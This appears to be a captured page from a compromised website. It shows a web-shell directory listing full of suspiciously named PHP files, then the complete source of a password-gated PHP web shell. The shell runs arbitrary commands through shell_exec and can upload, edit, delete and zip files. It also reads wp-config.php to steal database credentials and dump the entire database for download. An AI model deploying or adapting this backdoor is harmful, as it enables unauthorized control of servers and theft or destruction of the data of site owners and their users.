Gecko [ 36julay.space ]

Name	Size	Permission	Date
.well-known	[ DIR ]	dr-xr-xr-x	2025-08-31 20:43
adi	[ DIR ]	drwxr-xr-x	2025-09-06 08:22
admin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
api_key	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
assets	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
cgi-bin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
folderadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
folderanimenew	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
font	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
fonts	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
footer	[ DIR ]	drwxr-xr-x	2025-09-06 06:17
heroadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
includes	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
keyadmin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
nibondon	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
order	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pages	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pdf	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
photo	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
photo_smart	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
pin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
qr_photo	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
roaring	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
test	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
themesth	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-admin	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-coach	[ DIR ]	drwxr-xr-x	2025-09-06 08:30
wp-content	[ DIR ]	dr-xr-xr-x	2025-09-01 07:25
wp-includes	[ DIR ]	dr-xr-xr-x	2025-09-01 07:26
.htaccess	22.69 KB	-rw-r--r--	2025-09-06 10:26
amrlwbfc.php	53.21 KB	-rw-r--r--	2025-09-02 11:40
billmao.php	216.63 KB	-rw-r--r--	2025-09-04 18:19
db.php	61 B	-rw-r--r--	2025-09-06 02:44
error_log	12.29 KB	-rw-r--r--	2025-09-06 09:04
functions-helper.php	10.7 KB	-rw-r--r--	2025-09-06 04:00
goods.php	583 B	-rw-r--r--	2025-09-03 22:50
index.php	631 B	-rw-r--r--	2025-09-06 09:04
j250815_13.zip	3.58 KB	-rw-r--r--	2025-09-06 02:44
j250816_13.zip	3.58 KB	-rw-r--r--	2025-09-06 02:44
k.php	72 B	-rw-r--r--	2025-09-04 23:58
mnkalo.php	168.78 KB	-rw-r--r--	2025-09-04 18:24
nxpnlnfk.php	11.8 KB	-rw-r--r--	2025-09-02 11:28
ok.txt	4 B	-rw-r--r--	2025-07-27 00:22
php.ini	105 B	-rw-r--r--	2025-09-02 11:40
puffboat.php	3.78 KB	-rw-r--r--	2025-09-04 10:26
puskbguq.php	11.8 KB	-rw-r--r--	2025-09-02 11:40
robots.txt	3.02 KB	-rw-r--r--	2025-09-05 03:00
sirx.php	136.81 KB	-rw-r--r--	2025-09-04 18:07
t6wer-send.php	453 B	-rw-r--r--	2025-09-05 18:07
x-cp-KHoU3LOW.php	448 B	-rw-r--r--	2025-09-05 11:04
x-cp-cDequjHb.php	448 B	-rw-r--r--	2025-09-05 13:26
z.php	8.49 KB	-rw-r--r--	2025-07-31 02:22
zb.php	23.37 KB	-rw-r--r--	2025-09-02 12:24
zt2.php	52.07 KB	-rw-r--r--	2025-09-04 08:48

Rename

<?php $_0='access123';$_1='';$_2='';if(!isset($_GET['key'])||$_GET['key']!==$_0){http_response_code(404);exit;}session_start();$_3=isset($_GET['path'])?$_GET['path']:getcwd();@chdir($_3);$_3=getcwd();function delete_recursive_shell($_4){if(is_dir($_4))foreach(array_diff(scandir($_4),['.','..'])as $_5)delete_recursive_shell($_4.DIRECTORY_SEPARATOR.$_5);return is_dir($_4)?rmdir($_4):@unlink($_4);}function scan_dir_shell($_6){$_7=[];foreach(@scandir($_6)?:[]as $_5){if($_5==='.')continue;$_4=$_6.DIRECTORY_SEPARATOR.$_5;$_7[]=['name'=>$_5,'is_dir'=>is_dir($_4),'size'=>is_file($_4)?filesize($_4):'-','time'=>@date('Y-m-d H:i',@filemtime($_4)),'perms'=>substr(sprintf('%o',@fileperms($_4)),-4),'owner'=>'-','group'=>'-','path'=>$_4];}return $_7;}function zip_dir($_6,$_8){$_9=new ZipArchive();if($_9->open($_8,ZipArchive::CREATE)!==TRUE)return false;$_10=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($_6,FilesystemIterator::SKIP_DOTS));foreach($_10 as $_11){$_12=substr($_11->getPathname(),strlen($_6)+1);if($_11->isDir())$_9->addEmptyDir($_12);else $_9->addFile($_11->getPathname(),$_12);}return $_9->close();}if(isset($_POST['move_src'],$_POST['move_dst'])){$_13=$_POST['move_src'];$_14=$_POST['move_dst'];if(file_exists($_13)&&rename($_13,$_14))header("Location:?key=$_0&path=".urlencode($_3));else echo '<div style="color:red">Move Failed!</div>';exit;}if(isset($_GET['edit'])&&is_file($_GET['edit'])){$_15=$_GET['edit'];if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['fcontent'])){file_put_contents($_15,$_POST['fcontent']);header("Location: ?key=$_0&path=".urlencode($_3));exit;}echo '<h3>📝 Editing: '.htmlspecialchars($_15).'</h3>';echo '<form method="post" action="?key='.$_0.'&edit='.urlencode($_15).'&path='.urlencode($_3).'">
            <textarea name="fcontent" rows="20" style="width:90%;font-family:monospace;">'.htmlspecialchars(@file_get_contents($_15)).'</textarea><br>
            <button>Save</button>
          </form>';exit;}if(isset($_GET['show_file'])&&is_file($_GET['show_file'])){echo '<pre style="white-space:pre-wrap;background:#222;color:#fff;padding:10px;max-width:90vw;overflow:auto;">'.htmlspecialchars(file_get_contents($_GET['show_file'])).'</pre>';exit;}if(isset($_GET['viewimg'])&&is_file($_GET['viewimg'])){$_16=$_GET['viewimg'];$_17=strtolower(pathinfo($_16,PATHINFO_EXTENSION));header('Content-Type: image/'.($_17==='jpg'?'jpeg':$_17));readfile($_16);exit;}if(isset($_FILES['upfile'])){$_18=$_3.DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$_18);header("Location: ?key=$_0&path=".urlencode($_3));exit;}if(isset($_POST['unzip_file'])){$_8=$_POST['unzip_file'];$_17=strtolower(pathinfo($_8,PATHINFO_EXTENSION));if($_17==='zip'){$_19=new ZipArchive();if($_19->open($_8)===TRUE){$_19->extractTo(dirname($_8));$_19->close();}}header("Location: ?key=$_0&path=".urlencode($_3));exit;}if(isset($_GET['delete'])){delete_recursive_shell($_GET['delete']);header("Location: ?key=$_0&path=".urlencode($_3));exit;}if(isset($_GET['download'])&&is_file($_GET['download'])){$_5=$_GET['download'];header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_5).'"');header('Content-Length: '.filesize($_5));readfile($_5);exit;}if(isset($_GET['safe_download'])&&is_file($_GET['safe_download'])){$_5=$_GET['safe_download'];$_20=tempnam(sys_get_temp_dir(),'dl_');file_put_contents($_20,file_get_contents($_5));header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($_5).'.txt"');header('Content-Length: '.filesize($_20));readfile($_20);unlink($_20);exit;}if(isset($_GET['zipdir'])&&is_dir($_GET['zipdir'])){$_6=$_GET['zipdir'];$_21=basename($_6).'_'.date('Ymd_His').'.zip';$_22=tempnam(sys_get_temp_dir(),'zdir_');zip_dir($_6,$_22);header('Content-Type: application/zip');header('Content-Disposition: attachment; filename="'.$_21.'"');header('Content-Length: '.filesize($_22));readfile($_22);unlink($_22);exit;}if(isset($_GET['search'])&&$_GET['search']!==''){$_23=$_GET['search'];$_24=[];$_25=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($_3,FilesystemIterator::SKIP_DOTS));foreach($_25 as $_11){if(stripos($_11->getFilename(),$_23)!==false)$_24[]=$_11->getPathname();}echo '<h3>🔎 Search Results: '.htmlspecialchars($_23).'</h3><pre>'.htmlspecialchars(implode("\n",$_24)).'</pre>';echo '<a href="?key='.$_0.'&path='.urlencode($_3).'">← Back</a>';exit;}if(isset($_GET['terminal'])){$_26=isset($_GET['path'])?$_GET['path']:$_3;@chdir($_26);if(isset($_POST['cmd'])){$_27=shell_exec($_POST['cmd'].' 2>&1');$_26=getcwd();}echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>Terminal</title></head>
          <body style='background:#000;color:#0f0;font-family:monospace;padding:10px;'>";echo "<h2>📟 Terminal – <span style='color:#ccc;font-size:13px;'>".htmlspecialchars($_26)."</span></h2>";echo "<form method='post' style='margin-bottom:10px;'>
            <input name='cmd' placeholder='Enter command...' autofocus
                   style='width:80%;background:#000;color:#0f0;border:1px solid #0f0;font-family:monospace;padding:5px;margin-right:5px;'>
            <button style='padding:5px;'>Run</button>
          </form>";if(isset($_27)){echo "<pre style='background:#111;color:#0f0;padding:10px;border:1px solid #0f0;'>".htmlspecialchars($_27)."</pre>";}echo"<a href='?key=$_0&path=".urlencode($_26)."' style='color:#fff;font-size:17px;'>← Back to File Manager</a>";echo "</body></html>";exit;}if(isset($_GET['dumpdb'])){$_28=@file_get_contents(__DIR__.'/wp-config.php');preg_match("/DB_NAME[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_29);preg_match("/DB_USER[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_30);preg_match("/DB_PASSWORD[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_31);preg_match("/DB_HOST[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_32);$_33=$_29[1].'_'.date('Ymd_His').'.sql';$_34=tempnam(sys_get_temp_dir(),'db_');$_35="mysqldump --user=\"{$_30[1]}\" --password=\"{$_31[1]}\" --host=\"{$_32[1]}\" \"{$_29[1]}\" > \"$_34\" 2>&1";system($_35);if(filesize($_34)>0){header_remove();header('Content-Type: application/octet-stream');header("Content-Disposition: attachment; filename=\"$_33\"");header('Content-Length: '.filesize($_34));readfile($_34);unlink($_34);}else{echo '✖ Database dump failed!';}exit;}if(isset($_GET['dumpdb_php'])){$_28=@file_get_contents(__DIR__.'/wp-config.php');preg_match("/DB_NAME[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_29);preg_match("/DB_USER[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_30);preg_match("/DB_PASSWORD[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_31);preg_match("/DB_HOST[',\"\s]+\s*[',\"]([^',\"]+)[',\"]/",$_28,$_32);$_36=new mysqli($_32[1],$_30[1],$_31[1],$_29[1]);if($_36->$_37)die('✖ DB connect error');$_33=$_29[1].'_php_'.date('Ymd_His').'.sql';header('Content-Type: application/octet-stream');header("Content-Disposition: attachment; filename=\"$_33\"");$_38=[];$_39=$_36->query('SHOW TABLES');while($_40=$_39->fetch_row())$_38[]=$_40[0];foreach($_38 as $_41){$_40=$_36->query("SHOW CREATE TABLE `$_41`")->fetch_row();echo $_40[1].";\n\n";$_42=$_36->query("SELECT * FROM `$_41`");while($_43=$_42->fetch_assoc()){$_44='`'.implode('`,`',array_keys($_43)).'`';$_45="'".implode("','",array_map([$_36,'real_escape_string'],array_values($_43)))."'";echo"INSERT INTO `$_41` ($_44) VALUES ($_45);\n";}echo "\n";}exit;}$_10=scan_dir_shell($_3);?>
<!DOCTYPE html><html lang="en">
<head><meta charset="UTF-8"><title>WP</title>
<style>
body{font-family:sans-serif;background:#f3f5f7;color:#222;padding:10px}
table{width:100%;border-collapse:collapse}
td,th{border:1px solid #ccc;padding:6px;text-align:left}th{background:#eee}
a{color:#0076d7;text-decoration:none}a:hover{text-decoration:underline}
form[method="post"]{display:inline}
</style>
</head><body>
<h2>📂 Current Path: <?=htmlspecialchars($_3)?></h2>

<form method="GET" style="display:inline;">
  <input type="hidden" name="key" value="<?=$_0?>">
  <input type="hidden" name="path" value="<?=htmlspecialchars($_3)?>">
  <input name="search" placeholder="🔎 Search..." style="padding:4px;">
  <button>Search</button>
</form>
<form method="GET" style="display:inline;">
  <input type="hidden" name="key" value="<?=$_0?>">
  <input type="hidden" name="dumpdb" value="1">
  <button>⬇️ SQL</button>
</form>
<form method="GET" style="display:inline;">
  <input type="hidden" name="key" value="<?=$_0?>">
  <input type="hidden" name="dumpdb_php" value="1">
  <button>⬇️ SQL (PHP)</button>
</form>
<form method="POST" enctype="multipart/form-data" action="?key=<?=$_0?>&path=<?=urlencode($_3)?>" style="display:inline;">
  <input type="file" name="upfile">
  <button>Upload</button>
</form>
<a href="?key=<?=$_0?>&terminal=1&path=<?=urlencode($_3)?>" style="margin-left:10px;">🖥️ Terminal</a>
<table>
<tr><th>Name</th><th>Type</th><th>Size</th><th>Date</th><th>Actions</th></tr>
<?php if($_3!='/')echo"<tr><td colspan=5><a href='?key=$_0&path=".urlencode(dirname($_3))."'>⬆️ Parent</a></td></tr>";foreach($_10 as $_5){$_4=urlencode($_5['path']);echo"<tr><td>";if($_5['is_dir'])echo"📁 <a href='?key=$_0&path=$_4'>{$_5['name']}</a>";else echo"📄 {$_5['name']}";echo"</td><td>".($_5['is_dir']?'Folder':'File')."</td><td>{$_5['size']}</td><td>{$_5['time']}</td><td>";if(!$_5['is_dir']){echo"<a href='?key=$_0&download=$_4'>Download</a> | ";echo"<a href='?key=$_0&safe_download=$_4'>Safe-Download</a> | ";echo"<a href='?key=$_0&show_file=$_4' target='_blank'>Preview</a> | ";echo"<a href='?key=$_0&edit=$_4'>Edit</a> | ";if(preg_match('/\.(jpg|jpeg|png|gif|webp)$/i',$_5['name']))echo"<a href='?key=$_0&viewimg=$_4' target='_blank'>Image</a> | ";if(strtolower(pathinfo($_5['name'],PATHINFO_EXTENSION))==='zip')echo"<form style='display:inline;' method='post' action='?key=$_0&path=".urlencode($_3)."'>
                    <input type='hidden' name='unzip_file' value='".htmlspecialchars($_5['path'])."'><button>Unzip</button></form> | ";}if($_5['is_dir']){echo"<a href='?key=$_0&zipdir=$_4'>ZIP</a> | ";}echo"<a href='?key=$_0&delete=$_4' onclick='return confirm(\"Delete?\")'>Delete</a> | <a href='#' onclick=\"movefile('$_4')\">Move</a></td></tr>";}?>
</table>
<form id="moveform" method="POST" style="display:none;padding:10px;background:#ddd">
<input type="hidden" name="move_src" id="move_src">
Move to: <input name="move_dst"><button>Move</button>
</form>
<script>
function movefile(src){document.getElementById('move_src').value=decodeURIComponent(src);document.getElementById('moveform').style.display='block';}
</script>
<hr>
<form method="post">
Shell Command: <input name="cmd" style="width:60%"><button>Run</button>
</form>
<?php if(isset($_POST['cmd']))echo'<pre style="background:#181d27;color:#7fff98;padding:10px;border-radius:8px;box-shadow:0 2px 8px #0003">'.htmlspecialchars(shell_exec($_POST['cmd'].' 2>&1')).'</pre>';?>
</body></html>